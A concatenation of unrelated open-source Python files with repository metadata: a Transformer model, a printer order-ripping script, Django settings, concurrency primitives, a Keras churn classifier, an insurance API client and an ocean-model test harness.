attention_weights['decoder_layer{}_block2'.format(i+1)] = block2
return x, attention_weights
class Transformer(tf.keras.Model):
def __init__(self, num_layers, d_model, num_heads, dff,pe_dim,
target_vocab_size,max_pos_encoding, rate=0.1):
super(Transformer, self).__init__()
self.encoder = Encoder(num_layers, d_model, num_heads, dff,pe_dim, rate)
self.decoder = Decoder(num_layers, d_model, num_heads, dff,
target_vocab_size,max_pos_encoding, rate)
self.final_layer = tf.keras.layers.Dense(target_vocab_size)
def call(self, inp, tar, training,look_ahead_mask=None,dec_padding_mask=None,enc_padding_mask=None ):
enc_output = self.encoder(inp, training, enc_padding_mask) # (batch_size, inp_seq_len, d_model )
dec_output, attention_weights = self.decoder(tar, enc_output, training, look_ahead_mask, dec_padding_mask)
final_output = self.final_layer(dec_output) # (batch_size, tar_seq_len, target_vocab_size)
return final_output, attention_weights
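# Minimal usage sketch (not part of the original model code): the hyperparameters,
# feature dimension and sequence lengths below are illustrative assumptions only.
if __name__ == '__main__':
    sample_transformer = Transformer(num_layers=2, d_model=512, num_heads=8, dff=2048,
                                     pe_dim=100, target_vocab_size=8000,
                                     max_pos_encoding=100)
    dummy_features = tf.random.uniform((64, 50, 512))  # e.g. a batch of audio feature frames
    dummy_targets = tf.random.uniform((64, 26), minval=0, maxval=200, dtype=tf.int64)
    out, _ = sample_transformer(dummy_features, dummy_targets, training=False)
    print(out.shape)  # (64, 26, 8000)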
|
[
"noreply@github.com"
] |
axe76.noreply@github.com
|
838e9fe624e2fe600df5cb0d05cf9c342cd5bf7d
|
37cb5a09ff38e36b19fa82c33fa040e2b2d67cee
|
/order_creation_tool.py
|
8b193e2af3d9b54efbd71722e2db289554d4621a
|
[] |
no_license
|
Jeffrey-P-McAteer/dtg-printer-tool
|
21580c46e4ec9224f1ebafa75426626519c7726f
|
f51d9350312794a632e91bc5915657454738f957
|
refs/heads/master
| 2023-08-02T20:09:31.676761
| 2021-09-23T09:23:13
| 2021-09-23T09:23:13
| 338,182,872
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,152
|
py
|
import sys
import csv
import json
import os
import traceback
import time
# Change to the windows folder that the ripping software watches for new rip orders.
AUTORIP_XML_IN_DIRECTORY = r'C:\Users\17044\Desktop\test automation\hotfolder'
# Change "X:" to the location of the directory holding new order .csv files
PRE_RIP_ORDERS_CSV_DIR = r'C:\Users\17044\Downloads'
# For each line in each .csv file, the ItemCode
# column will be read + this directory will be searched for a
# .png or .jpg file containing "ItemCode" anywhere in the name.
PRE_RIP_ORDERS_IMAGES_DIR = r'C:\Users\17044\Downloads'
# For testing
if 'AUTORIP_XML_IN_DIRECTORY' in os.environ:
AUTORIP_XML_IN_DIRECTORY = os.environ['AUTORIP_XML_IN_DIRECTORY']
# For testing
if 'PRE_RIP_ORDERS_CSV_DIR' in os.environ:
PRE_RIP_ORDERS_CSV_DIR = os.environ['PRE_RIP_ORDERS_CSV_DIR']
# For testing
if 'PRE_RIP_ORDERS_IMAGES_DIR' in os.environ:
PRE_RIP_ORDERS_IMAGES_DIR = os.environ['PRE_RIP_ORDERS_IMAGES_DIR']
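# Example (hypothetical paths, shown only to illustrate the overrides above):
# on Windows the directories can be redirected for a test run with, e.g.
#   set AUTORIP_XML_IN_DIRECTORY=C:\temp\hotfolder
#   set PRE_RIP_ORDERS_CSV_DIR=C:\temp\orders
#   set PRE_RIP_ORDERS_IMAGES_DIR=C:\temp\images
#   python order_creation_tool.py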
def clear_screen():
os.system('cls' if os.name=='nt' else 'clear')
def get_user_input(prompt='> '):
if sys.version_info[0] < 3:
return raw_input(prompt)
else:
return input(prompt)
def get_user_file_pick():
if sys.version_info[0] < 3:
import Tkinter, tkFileDialog
root = Tkinter.Tk()
root.withdraw()
return tkFileDialog.askopenfilename()
else:
import tkinter
from tkinter import filedialog
return filedialog.askopenfilename()
def search_for_prerip_image(name):
"""
Searches PRE_RIP_ORDERS_IMAGES_DIR and returns the first file ending in .png or .jpg
which contains "name" in its filename.
"""
for dirpath, dirnames, filenames in os.walk(PRE_RIP_ORDERS_IMAGES_DIR):
for file in filenames:
            if name.lower() in file.lower() and (file.lower().endswith('.png') or file.lower().endswith('.jpg')):
# We found it!
return os.path.join(dirpath, file)
return None
def create_order_rip_xml_request(order_csv_file):
print('Reading orders from {}'.format(order_csv_file))
with open(order_csv_file, 'r') as fd:
reader = csv.DictReader(fd)
for row in reader:
try:
# Debugging
# print(json.dumps(row, sort_keys=True, indent=4))
item_code = row['ItemCode']
item_name = row['ItemName']
# Handle error case from the .csv having 2x headers.
if item_name.strip() == 'ItemName':
continue
                print('Creating rip order for item "{}" ({})'.format(item_name, item_code))
lead_time = row.get('LeadTime', '')
print_category = row.get('U_ARGNS_CATEGORY', '')
columns = row.get('U_ARGNS_COL', '')
art_type = row.get('U_ARGNS_ART_TYPE', '')
graphic_category = row.get('U_ARGNS_GRAPHIC_CAT', '')
graphic_type = row.get('U_ARGNS_GRAPHIC_TYPE', '')
number_of_colors = row.get('U_ARGNS_NUM_COLORS', '')
material = row.get('U_ARGNS_MATERIAL', '')
height = row.get('U_ARGNS_ART_TYPE_SIZE_HEIGHT', '')
width = row.get('U_ARGNS_ART_TYPE_SIZE_WIDTH', '')
print('Lead Time = {}'.format(lead_time))
print('Category = {}'.format(print_category))
print('Columns = {}'.format(columns))
print('Art Type = {}'.format(art_type))
print('Graphic Category = {}'.format(graphic_category))
print('Graphic Type = {}'.format(graphic_type))
print('# of colors = {}'.format(number_of_colors))
if not material:
print('Material is empty! Please input material manually (eg "AAA of the Loom white, L" w/o quotes):')
material = get_user_input('material: ')
print('material = {}'.format(material))
if not width:
print('Width is empty! Please input rip width manually:')
width = get_user_input('width: ')
if not height:
print('Height is empty! Please input rip height manually:')
height = get_user_input('height: ')
print('width = {}'.format(width))
print('height = {}'.format(height))
# TODO auto-map x and y from some known profiles
                x = row.get('x', '')
if not x:
print('X is empty! Please input x manually (0=left of shirt, ???=right):')
x = get_user_input('x: ')
y = row.get('y', '')
if not y:
print('Y is empty! Please input y manually (0=top of shirt, ???=bottom):')
y = get_user_input('y: ')
# TODO map this from a .csv file or something
rip_profile = row.get('rip-profile', '')
if not rip_profile:
print('Could not determine rip profile, please enter one manually (eg shirt-white):')
rip_profile = get_user_input('rip_profile: ')
image_file = search_for_prerip_image(item_code)
if image_file:
print('Press enter to use the image {} for print code {}'.format(os.path.basename(image_file), item_code))
get_user_input()
else:
print('No image file found within {} for print code {}'.format(PRE_RIP_ORDERS_IMAGES_DIR, item_code))
while not image_file or not os.path.exists(image_file):
print('Press enter to select an image file for this rip')
get_user_input()
try:
image_file = get_user_file_pick()
except:
traceback.print_exc()
request_xml_file = os.path.join(AUTORIP_XML_IN_DIRECTORY, '{}.xml'.format(item_code))
with open(request_xml_file, 'w') as fd:
fd.write('''
<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<Order>
<Id>{item_code}</Id>
<Images>
<Image>
<Id>{item_code}-i0</Id>
<SourceImage>{image_file}</SourceImage>
<RipProfile>{rip_profile}</RipProfile>
<ColorPasses>3</ColorPasses>
<Size>
<Width>{width}</Width>
<Height>{height}</Height>
</Size>
<Rotation>0</Rotation>
</Image>
</Images>
<Products>
<Product>
<Id>{item_code}-p0</Id>
<DesiredCount>1</DesiredCount>
<Material>{material}</Material>
<Prints>
<Print>
<Id>{item_code}-p0p1</Id>
<ImageId>{item_code}-i0</ImageId>
<PrintArea>front</PrintArea>
<Position>
<X>{x}</X>
<Y>{y}</Y>
</Position>
</Print>
</Prints>
</Product>
</Products>
</Order>
'''.format(
item_code=item_code,
image_file=image_file,
width=width,
height=height,
material=material,
rip_profile=rip_profile,
x=x,
y=y,
).strip())
print('Created rip request {}'.format(request_xml_file))
                # Poll for up to 25 seconds to ensure file is accepted by auto-rip SW
print('Polling request until accepted')
accepted = False
for _ in range(0, 25 * 2):
print('.', end='', flush=True)
time.sleep(0.5)
if not os.path.exists(request_xml_file):
accepted = True
break
if accepted:
print('Auto-rip process started!')
print('Press enter to continue...')
get_user_input()
clear_screen()
except:
traceback.print_exc()
print('=' * 25)
print(' Error in spreadsheet row, please check for missing data. ')
print(' Continuing to next row in 5 seconds... ')
print('=' * 25)
time.sleep(5)
def main(args=sys.argv):
processed_at_least_one = False
for dirpath, dirnames, filenames in os.walk(PRE_RIP_ORDERS_CSV_DIR):
for file in filenames:
if file.lower().endswith('.csv'):
processed_at_least_one = True
create_order_rip_xml_request( os.path.join(dirpath, file) )
if not processed_at_least_one:
print('''
WARNING: No input .csv files found, please ensure that either:
- pre-rip .csv files have been added to {PRE_RIP_ORDERS_CSV_DIR}
or
- The PRE_RIP_ORDERS_CSV_DIR variable in {script_path}
has been updated to point to the pre-rip .csv directory.
'''.format(PRE_RIP_ORDERS_CSV_DIR=PRE_RIP_ORDERS_CSV_DIR, script_path=__file__))
print('Press enter to continue...')
get_user_input()
if __name__ == '__main__':
main()
|
[
"jeffrey.p.mcateer@gmail.com"
] |
jeffrey.p.mcateer@gmail.com
|
ed2c8ca2cc30fcb085094f35f60e5fe97a0ea5ce
|
488d58e7a0b73fa17b87d3162e389d49dd4b63c9
|
/myblog/settings.py
|
d3b457a6905cd1144e9f52cbbcab5e4113b430d1
|
[] |
no_license
|
rm4703/myblog
|
58cae8d6907fd968f0704313751bc4faa259fb06
|
7dcb402cfecd4ff447796bdcb9a0889cfedd19db
|
refs/heads/master
| 2020-04-24T06:29:03.643163
| 2019-02-21T01:22:10
| 2019-02-21T01:22:10
| 171,764,902
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,325
|
py
|
"""
Django settings for myblog project.
Generated by 'django-admin startproject' using Django 2.0.4.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '_fn-o_ie57nojxy+1=)*2_+iy=_cp1%g_odh!+s03)ugq0f!n7'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'users.apps.UsersConfig',
'blog.apps.BlogConfig',
'django.contrib.admin',
'crispy_forms',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'myblog.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'myblog.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
MEDIA_ROOT = os.path.join(BASE_DIR,'media')
MEDIA_URL = '/media/'
CRISPY_TEMPLATE_PACK = 'bootstrap4'
LOGIN_REDIRECT_URL = 'blog-home'
LOGIN_URL = 'login'
|
[
"r.m.d.karunarathna@gmail.com"
] |
r.m.d.karunarathna@gmail.com
|
76bb9e0cafe73ba95cf62ab87ccc7cef03942f0d
|
556423abe075b21a03f6fdbaea2a6acd44a46a00
|
/tapystry/concurrency.py
|
6e9576e580a2536189c3d52cdc0e7069a58a7437
|
[
"MIT"
] |
permissive
|
daniel-ziegler/tapystry
|
ebb43be58c2b733e0b4f8f395879d6b09bbff151
|
927d51be776103d7cbfa29a02ce93c0bc5747d12
|
refs/heads/master
| 2022-11-20T19:27:39.023537
| 2020-07-20T18:30:50
| 2020-07-20T18:30:50
| 281,474,463
| 0
| 0
|
MIT
| 2020-07-21T18:29:35
| 2020-07-21T18:29:34
| null |
UTF-8
|
Python
| false
| false
| 3,614
|
py
|
from uuid import uuid4
from collections import deque
from tapystry import Call, Broadcast, Receive, TapystryError, as_effect
"""
TODO: have something like a Promise?
def doStuffWithPromise(p):
...
yield p.Resolve(val)
p = Promise()
yield Fork(doStuffWithPromise, (p,))
yield p
reem suggests just running an asyncio event loop to schedule ascynio futures
"""
class Lock():
"""
Like a traditional lock
Usage:
l = Lock()
release = yield l.Acquire()
...
yield release
"""
def __init__(self, name=None):
self._id = uuid4()
self._q = deque()
self.name = name or ""
self._counter = 0
@as_effect()
def Acquire(self):
acquire_id = self._counter
self._counter += 1
def remove():
self._q.remove(acquire_id)
@Call
def Release():
if not len(self._q) or acquire_id != self._q.popleft():
raise TapystryError(f"Yielded same lock release multiple times? {self.name}")
if len(self._q):
# use immediate=True to make sure receiving thread doesn't get canceled before the receive happens
yield Broadcast(f"lock.{self._id}.{self._q[0]}", immediate=True)
if len(self._q) > 0:
self._q.append(acquire_id)
yield Receive(f"lock.{self._id}.{acquire_id}", oncancel=remove)
else:
self._q.append(acquire_id)
return Release
class Queue():
"""
A queue of items.
Each item can only be taken once.
A buffer_size value of -1 indicates no limit
"""
def __init__(self, name=None, buffer_size=0):
self._id = uuid4()
self._buffer_size = buffer_size
self.name = name or ""
self._buffer = deque()
# queue of gets (if queue is empty)
self._gets = deque()
# queue of puts (if queue is full)
self._puts = deque()
self._put_vals = dict()
self._counter = 0
@as_effect()
def Put(self, item):
put_id = self._counter
self._counter += 1
def remove():
self._puts.remove(put_id)
self._put_vals.pop(put_id)
if len(self._gets):
assert not len(self._puts)
get_id = self._gets.popleft()
yield Broadcast(f"put.{self._id}.{get_id}", item, immediate=True)
else:
if self._buffer_size >= 0 and len(self._buffer) >= self._buffer_size:
assert len(self._buffer) == self._buffer_size
self._puts.append(put_id)
self._put_vals[put_id] = item
yield Receive(f"get.{self._id}.{put_id}", oncancel=remove)
else:
self._buffer.append(item)
@as_effect()
def Get(self):
get_id = self._counter
self._counter += 1
def remove():
self._gets.remove(get_id)
if len(self._buffer):
item = self._buffer.popleft()
if len(self._puts):
put_id = self._puts.popleft()
self._buffer.append(self._put_vals.pop(put_id))
yield Broadcast(f"get.{self._id}.{put_id}", immediate=True)
elif len(self._puts):
assert self._buffer_size == 0
put_id = self._puts.popleft()
item = self._put_vals.pop(put_id)
yield Broadcast(f"get.{self._id}.{put_id}", immediate=True)
else:
self._gets.append(get_id)
item = yield Receive(f"put.{self._id}.{get_id}", oncancel=remove)
return item
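# Usage sketch for Queue, by analogy with the Lock docstring above (the surrounding
# generator is assumed to run inside a tapystry strand):
#     q = Queue()
#     yield q.Put(item)     # blocks while the buffer is full
#     item = yield q.Get()  # blocks while the queue is empty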
|
[
"wuthefwasthat@gmail.com"
] |
wuthefwasthat@gmail.com
|
10e3051c6277a5bc0cdf2a0185509e35acb29bc2
|
1b94f9b96fd986a47bab1a839bb13045dfef61e4
|
/tests/read_write_json_test.py
|
19fa326989368ef4a7dc2c8619aede7880e2bb9b
|
[
"MIT"
] |
permissive
|
Amine-HADJEMI/python-code-katas
|
565052c9413ff21afb1a57923461bff8acd91a15
|
496d9224bbef3ee83a0e94f3a27b8e03159f84c5
|
refs/heads/master
| 2023-03-18T20:30:20.465499
| 2020-11-10T07:11:44
| 2020-11-10T07:11:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 521
|
py
|
from src.katas.read_write_json import write_to_json_file, read_from_json_file
import unittest
class ReadWriteJsonTest(unittest.TestCase):
_data = {
"president": {
"name": "Zaphod Beeblebrox",
"species": "Betelgeusian"
}
}
def test_can_write_given_data_to_json_file_in_proper_json_format(self):
json_file = 'tests/fixtures/data_file.json'
write_to_json_file(self._data, json_file)
self.assertEqual(self._data, read_from_json_file(json_file))
|
[
"tjthavarshan@gmail.com"
] |
tjthavarshan@gmail.com
|
ed9eb94b204c2ea8d226b54c922d1098dc84d7f6
|
c0a10e255a0eccbda95427d3c32208298bf95f68
|
/build_ann_improve.py
|
7a7357ca9cd0240818bda78b8dc677b7c4421338
|
[] |
no_license
|
jrachid/ArtificialNeuronNetwork
|
93093c3ef0407831459a4badac45963bc03308f7
|
4a78359a0e120580e95f6bfd4e2db212c5e9efa8
|
refs/heads/master
| 2020-04-17T11:24:03.437282
| 2019-01-19T11:27:01
| 2019-01-19T11:27:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,433
|
py
|
'''
A bank has noticed that, recently, many of its customers have been leaving.
The bank hires you to understand what is happening and why.
It has selected a subset of its customers; this sample contains 10,000 clients.
customerID|Surname|CreditScore|Geography|Gender|Age|Tenure|Balance|NumOfProducts|HasCrCard|
isActiveMember|EstimatedSalary|Exited
CreditScore: measures a client's ability to repay
Tenure: number of years the person has been a client of the bank
Exited: whether the client left the bank, observed over 6 months (1 = left the bank)
The goal is to find the segment of clients most likely to leave the bank.
Once the bank has identified this segment, it can contact those clients and tailor its offer to them.
This is therefore a classification problem.
'''
### Data Preprocessing ###
# Importing the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Importing the dataset
dataset = pd.read_csv('Churn_Modelling.csv')
X = dataset.iloc[:, 3:13].values
y = dataset.iloc[:, -1].values
# Encoding categorical data - independent variable
from sklearn.preprocessing import LabelEncoder, OneHotEncoder
labelencoder_x1 = LabelEncoder()
X[:,1] = labelencoder_x1.fit_transform(X[:,1])
labelencoder_x2 = LabelEncoder()
X[:,2] = labelencoder_x2.fit_transform(X[:,2])
# Create the France/Spain/Germany dummy columns
onehotencoder = OneHotEncoder(categorical_features = [1])
X = onehotencoder.fit_transform(X).toarray()
# Drop one dummy column to avoid the dummy variable trap
X = X[:,1:]
# Splitting the dataset into the Training set and Test set
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)
# Feature Scaling
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
X_train = sc.fit_transform(X_train)
X_test = sc.transform(X_test)
### Build ANN ###
# Importing Keras modules
import keras
# Module for initialization of the ANN
from keras.models import Sequential
# Module for creating layers inside the ANN
from keras.layers import Dense, Dropout
# Initialization of the ANN
classifier = Sequential()
# Add the input layer and the first hidden layer
# Use the rectifier (ReLU) activation in the hidden layers and the sigmoid function for the output
classifier.add(Dense(units = 6, activation = "relu", kernel_initializer = "uniform", input_dim=11))
# Use the Dropout class to reduce overfitting
classifier.add(Dropout(rate=0.1))
# Add a second hidden layer
classifier.add(Dense(units = 6, activation = "relu", kernel_initializer = "uniform"))
classifier.add(Dropout(rate=0.1))
# Add the output layer ( with probability)
classifier.add(Dense(units = 1, activation = "sigmoid", kernel_initializer = "uniform"))
# Compile the ANN (with stochastic gradient descent)
classifier.compile(optimizer = "adam", loss="binary_crossentropy", metrics=["accuracy"])
# Train the ANN
classifier.fit(X_train, y_train, batch_size = 10, epochs=100)
# Predicting the Test set results
y_pred = classifier.predict(X_test)
# Transform y_pred to boolean
y_pred = (y_pred > 0.5)
# Making the Confusion Matrix
from sklearn.metrics import confusion_matrix
cm = confusion_matrix(y_test, y_pred)
# Make a prediction
classifier.predict(sc.transform(np.array([[0.0,0,600,1,40,3,60000,2,1,1,50000]]))) > 0.5
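# Quick accuracy check from the confusion matrix (sketch): the diagonal holds the
# correct predictions, so accuracy = (TP + TN) / total.
accuracy = (cm[0, 0] + cm[1, 1]) / float(cm.sum())
print(accuracy)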
|
[
"rachidj@protonmail.ch"
] |
rachidj@protonmail.ch
|
83c80056c6cc34b59806b887e9533647b054c969
|
b3c856026a28c766755d7a94e04c1d46a57d3769
|
/language/nodes/Pattern.py
|
4a58954d9555bdb1becb4d391d3797502dfb144e
|
[] |
no_license
|
nipster94/humanoid-robotics
|
b72d3409b1b9fa83521a7330a0985b5ad5786b72
|
64c3852184d1e632403cf2a05906e56c81f28e08
|
refs/heads/master
| 2023-04-14T01:38:29.554381
| 2021-04-28T17:11:46
| 2021-04-28T17:11:46
| 211,831,854
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 170
|
py
|
class Pattern:
def __init__(self, string):
self.string = string
def getString(self):
return self.string
def setString(self, string):
self.string = string
|
[
"mailtonipun94@gmail.com"
] |
mailtonipun94@gmail.com
|
51c4faecec1d981801b414bef09674ab7bb6981e
|
7e9d0982969c4875d58b527c72455da93ad8d0aa
|
/pioneer/client.py
|
2d3f97647603c36b617610ac94158ad943b77d5d
|
[] |
no_license
|
vbanasihan/sample_code
|
bc6aeb5b69850cb8669adfb2f86d861daf35ea2a
|
cebfd605a3c8e790d0a8e9360524d0bdaed2f408
|
refs/heads/master
| 2023-02-09T06:31:45.590297
| 2020-12-31T23:18:25
| 2020-12-31T23:49:31
| 325,887,289
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,067
|
py
|
from django.conf import settings
from maria.client import HTTPAPIClient
class PioneerClient(HTTPAPIClient):
BASE_URL = settings.PIONEER_URL_PROD if settings.PIONEER_PROD else settings.PIONEER_URL_STAGING
PRODUCT_TYPE_MEDICASH_DENGUE = 'MD'
PRODUCT_TYPE_LEPTOSPIROSIS = 'ML'
GENDER_MALE = 'M'
GENDER_FEMALE = 'F'
CIVIL_STATUS_SINGLE = 'S'
CIVIL_STATUS_MARRIED = 'M'
def __init__(self, username, password, api_key):
super(PioneerClient, self).__init__(base_url=self.BASE_URL)
self.login(username, password, api_key)
def build_url(self, path):
url = '{}{}?api_key={}'.format(
self.base_url.format(
self.username,
self.password
),
path,
self.api_key
)
print(url)
return url
def get_auth(self):
return (self.username, self.password)
def login(self, username, password, api_key):
self.username = username
self.password = password
self.api_key = api_key
def order(
self,
issuance_source,
branch_of_purchase,
product_type,
email,
firstname,
middlename,
lastname,
gender,
mobileno,
bdate,
civ_stat,
province,
city,
zipcode,
street_brgy,
insured_email,
insured_firstname,
insured_middlename,
insured_lastname,
insured_gender,
insured_mobileno,
insured_bdate,
insured_civ_stat,
insured_province,
insured_city,
insured_zipcode,
insured_street_brgy,
cc_email,
bcc_email,
): # spelling these all out for explicitness (instead of using kwargs)
r = self.post('/register_medicash', json={
'issuance_source': issuance_source,
'branch_of_purchase': branch_of_purchase,
'product_type': product_type,
'email': email,
'firstname': firstname,
'middlename': middlename,
'lastname': lastname,
'gender': gender,
'mobileno': mobileno,
'bdate': bdate,
'civ_stat': civ_stat,
'province': province,
'city': city,
'zipcode': zipcode,
'street_brgy': street_brgy,
'insured_email': insured_email,
'insured_firstname': insured_firstname,
'insured_middlename': insured_middlename,
'insured_lastname': insured_lastname,
'insured_gender': insured_gender,
'insured_mobileno': insured_mobileno,
'insured_bdate': insured_bdate,
'insured_civ_stat': insured_civ_stat,
'insured_province': insured_province,
'insured_city': insured_city,
'insured_zipcode': insured_zipcode,
'insured_street_brgy': insured_street_brgy,
'cc_email': cc_email,
'bcc_email': bcc_email,
})
        return r
|
[
"silvenepistola@gmail.com"
] |
silvenepistola@gmail.com
|
51a155118d26cb9fbbbe172f223b46f6532c9ecb
|
ac517b0cf71b2b501b184d3f10347294232c179a
|
/ocean_tasks.py
|
36f6a04579c7fe6706b74603e46abaff558d4db7
|
[] |
no_license
|
douglasjacobsen/mpas-lettuce-ocean
|
6135b48cc168bae34ca1b828330b91765efed8bc
|
63dd5dc12e92667c7636ca7b8a5f37aea705e5bb
|
refs/heads/master
| 2016-09-15T22:32:23.590598
| 2015-02-18T17:51:05
| 2015-02-18T17:51:05
| 14,343,146
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,836
|
py
|
import sys, os, glob, shutil, numpy, math
import subprocess
from netCDF4 import *
from netCDF4 import Dataset as NetCDFFile
from pylab import *
from lettuce import *
from collections import defaultdict
import xml.etree.ElementTree as ET
dev_null = open(os.devnull, 'w')
def seconds_to_timestamp(seconds):#{{{
days = 0
hours = 0
minutes = 0
if seconds >= 24*3600:
days = int(seconds/(24*3600))
seconds = seconds - int(days * 24 * 3600)
if seconds >= 3600:
hours = int(seconds/3600)
seconds = seconds - int(hours*3600)
if seconds >= 60:
minutes = int(seconds/60)
seconds = seconds - int(minutes*60)
timestamp = "%4.4d_%2.2d:%2.2d:%2.2d"%(days, hours, minutes, seconds)
return timestamp
#}}}
def timestamp_to_seconds(timestamp):#{{{
    in_str = timestamp.replace("'", "")  # strip quotes copied from the namelist value
days = 0
hours = 0
minutes = 0
seconds = 0
if timestamp.find("_") > 0:
parts = in_str.split("_")
ymd = parts[0]
tod = parts[1]
        if ymd.count("-") == 0:
days = days + float(ymd)
        elif ymd.count("-") == 1:
parts = ymd.split("-")
days = days + 30 * float(parts[0])
days = days + float(parts[1])
        elif ymd.count("-") == 2:
parts = ymd.split("-")
days = days + 365 * float(parts[0])
days = days + 30 * float(parts[1])
days = days + float(parts[2])
else:
tod = in_str
    if tod.count(":") == 0:
seconds = float(tod)
    elif tod.count(":") == 1:
parts = tod.split(":")
minutes = float(parts[0])
seconds = float(parts[1])
    elif tod.count(":") == 2:
parts = tod.split(":")
hours = float(parts[0])
minutes = float(parts[1])
seconds = float(parts[2])
seconds = seconds + minutes * 60 + hours * 3600 + days * 24 * 3600
return seconds
#}}}
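# Example: seconds_to_timestamp(90061) returns "0001_01:01:01" (1 day, 1 h, 1 min, 1 s);
# timestamp_to_seconds reverses this, giving 90061.0, so the two helpers are inverses.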
@step('A "([^"]*)" "([^"]*)" "([^"]*)" "([^"]*)" test')#{{{
def get_test_case(step, size, levs, test, time_stepper):
for testtype in ('trusted', 'testing'):
world.base_dir = os.getcwd()
world.test = "%s_%s_%s"%(test, size, levs)
world.num_runs = 0
world.namelist = "namelist.ocean_forward"
world.streams = "streams.ocean_forward"
#Setup trusted...
if not os.path.exists("%s/%s_tests"%(world.base_dir, testtype)):
command = "mkdir"
arg1 = "-p"
arg2 = "%s/%s_tests"%(world.base_dir, testtype)
subprocess.call([command, arg1, arg2], stdout=dev_null, stderr=dev_null)
os.chdir("%s/%s_tests"%(world.base_dir, testtype))
if world.clone:
if not os.path.exists("%s/%s_tests/%s.tgz"%(world.base_dir, testtype, world.test)):
command = "wget"
arg1 = "%s/%s.tgz"%(world.trusted_url, world.test)
subprocess.call([command, arg1], stdout=dev_null, stderr=dev_null)
if not os.path.exists("%s/%s_tests/%s"%(world.base_dir, testtype, world.test)):
command = "tar"
arg1 = "xzf"
arg2 = "%s.tgz"%world.test
subprocess.call([command, arg1, arg2], stdout=dev_null, stderr=dev_null)
command = "cp"
arg1 = "%s/namelist.ocean_forward"%world.test
arg2 = "%s/namelist.ocean_forward.default"%world.test
subprocess.call([command, arg1, arg2], stdout=dev_null, stderr=dev_null)
command = "cp"
arg1 = "%s/streams.ocean_forward.xml"%world.test
arg2 = "%s/streams.ocean_forward.default.xml"%world.test
subprocess.call([command, arg1, arg2], stdout=dev_null, stderr=dev_null)
os.chdir("%s/%s_tests/%s"%(world.base_dir, testtype, world.test))
for exetype in ('trusted', 'testing'):
command = "ln"
arg1 = "-s"
arg2 = "%s/%s/ocean_forward_model"%(world.base_dir, exetype)
arg3 = "ocean_model_%s"%(exetype)
subprocess.call([command, arg1, arg2, arg3], stdout=dev_null, stderr=dev_null)
command = "cp"
arg1 = "namelist.ocean_forward.default"
arg2 = "namelist.ocean_forward"
subprocess.call([command, arg1, arg2], stdout=dev_null, stderr=dev_null)
command = "cp"
arg1 = "streams.ocean_forward.default"
arg2 = "streams.ocean_forward"
subprocess.call([command, arg1, arg2], stdout=dev_null, stderr=dev_null)
command = "rm"
arg1 = "-f"
arg2 = '\*.output.nc'
subprocess.call([command, arg1, arg2], stdout=dev_null, stderr=dev_null)
# {{{ Setup namelist file
namelistfile = open(world.namelist, 'r+')
lines = namelistfile.readlines()
for line in lines:
if line.find("config_dt") >= 0:
line_split = line.split(" = ")
world.dt = line_split[1]
world.dt_sec = timestamp_to_seconds(line_split[1])
if line.find("config_time_integrator") >= 0:
line_split = line.split(" = ")
world.old_time_stepper = line_split[1].replace("'","")
world.time_stepper_change = False
if world.old_time_stepper.find(time_stepper) < 0:
world.time_stepper_change = True
if world.old_time_stepper.find("split_explicit") >= 0:
world.dt_sec /= 10.0
elif time_stepper.find("split_explicit") >= 0:
world.dt_sec *= 10.0
duration = seconds_to_timestamp(int(world.dt_sec*2))
namelistfile.seek(0)
namelistfile.truncate()
for line in lines:
new_line = line
if line.find("config_run_duration") >= 0:
new_line = " config_run_duration = '%s'\n"%(duration)
elif line.find("config_output_interval") >= 0:
new_line = " config_output_interval = '0000_00:00:01'\n"
